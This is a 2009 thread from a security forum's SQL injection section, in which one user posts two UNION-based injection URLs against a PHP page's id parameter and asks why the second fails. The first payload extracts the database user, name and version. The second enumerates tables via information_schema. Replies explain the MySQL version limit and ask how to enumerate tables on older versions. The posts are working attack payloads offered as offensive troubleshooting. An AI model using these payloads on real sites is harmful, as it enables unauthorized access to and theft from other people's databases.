|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Help! Sql injection Warning: mysql_num_rows(): supplied ... |
|
Posted: Tue Nov 03, 2009 8:28 pm |
|
|
Cablekid |
Advanced user |
|
|
Joined: Jul 14, 2007 |
Posts: 85 |
|
|
|
|
|
|
|
I keep getting Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource
Code: | http://www.site.com/artist.php?id=null%20union%20all%20select%201,2,3,concat(user(),char(58),database(),char(58),version()),5,6,7,8,9,10-- |
Works fine and i get
But when i do...
Code: | http://www.site.com/artist.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10 from information_schema.tables-- |
It gives me Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource ....
And i cant figure it out?!@ Help? |
|
|
|
|
Posted: Wed Nov 04, 2009 7:22 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
information_schema.tables exist only in version 5 and higher. |
|
|
|
|
Posted: Wed Nov 04, 2009 1:22 pm |
|
|
Cablekid |
Advanced user |
|
|
Joined: Jul 14, 2007 |
Posts: 85 |
|
|
|
|
|
|
|
Thanks! |
|
|
|
|
Posted: Sun Dec 06, 2009 7:39 pm |
|
|
dasatti |
Regular user |
|
|
Joined: Dec 03, 2009 |
Posts: 9 |
Location: Pakistan |
|
|
|
|
|
|
So is their some way to get the tables and columns information in MySQL version less than 5.0 other than blink SQL?? |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|